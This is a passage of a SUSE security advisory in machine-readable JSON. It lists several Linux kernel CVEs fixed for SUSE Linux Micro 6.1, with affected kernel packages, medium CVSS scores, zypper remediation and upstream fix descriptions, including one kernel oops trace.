"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40231",
"url": "https://www.suse.com/security/cve/CVE-2025-40231"
},
{
"category": "external",
"summary": "SUSE Bug 1254815 for CVE-2025-40231",
"url": "https://bugzilla.suse.com/1254815"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40231"
},
{
"cve": "CVE-2025-40233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: clear extent cache after moving/defragmenting extents\n\nThe extent map cache can become stale when extents are moved or\ndefragmented, causing subsequent operations to see outdated extent flags. \nThis triggers a BUG_ON in ocfs2_refcount_cal_cow_clusters().\n\nThe problem occurs when:\n1. copy_file_range() creates a reflinked extent with OCFS2_EXT_REFCOUNTED\n2. ioctl(FITRIM) triggers ocfs2_move_extents()\n3. __ocfs2_move_extents_range() reads and caches the extent (flags=0x2)\n4. ocfs2_move_extent()/ocfs2_defrag_extent() calls __ocfs2_move_extent()\n which clears OCFS2_EXT_REFCOUNTED flag on disk (flags=0x0)\n5. The extent map cache is not invalidated after the move\n6. Later write() operations read stale cached flags (0x2) but disk has\n updated flags (0x0), causing a mismatch\n7. BUG_ON(!(rec-\u003ee_flags \u0026 OCFS2_EXT_REFCOUNTED)) triggers\n\nFix by clearing the extent map cache after each extent move/defrag\noperation in __ocfs2_move_extents_range(). This ensures subsequent\noperations read fresh extent data from disk.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40233",
"url": "https://www.suse.com/security/cve/CVE-2025-40233"
},
{
"category": "external",
"summary": "SUSE Bug 1254813 for CVE-2025-40233",
"url": "https://bugzilla.suse.com/1254813"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40233"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n __driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40240"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: avoid NULL dereference when chunk data buffer is missing\n\nchunk-\u003eskb pointer is dereferenced in the if-block where it\u0027s supposed\nto be NULL only.\n\nchunk-\u003eskb can only be NULL if chunk-\u003ehead_skb is not. Check for frag_list\ninstead and do it just before replacing chunk-\u003eskb. We\u0027re sure that\notherwise chunk-\u003eskb is non-NULL because of outer if() condition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40240",
"url": "https://www.suse.com/security/cve/CVE-2025-40240"
},
{
"category": "external",
"summary": "SUSE Bug 1254869 for CVE-2025-40240",
"url": "https://bugzilla.suse.com/1254869"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40240"
},
{
"cve": "CVE-2025-40242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40242"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix unlikely race in gdlm_put_lock\n\nIn gdlm_put_lock(), there is a small window of time in which the\nDFL_UNMOUNT flag has been set but the lockspace hasn\u0027t been released,\nyet. In that window, dlm may still call gdlm_ast() and gdlm_bast().\nTo prevent it from dereferencing freed glock objects, only free the\nglock if the lockspace has actually been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40242",
"url": "https://www.suse.com/security/cve/CVE-2025-40242"
},
{
"category": "external",
"summary": "SUSE Bug 1255075 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "external",
"summary": "SUSE Bug 1255076 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
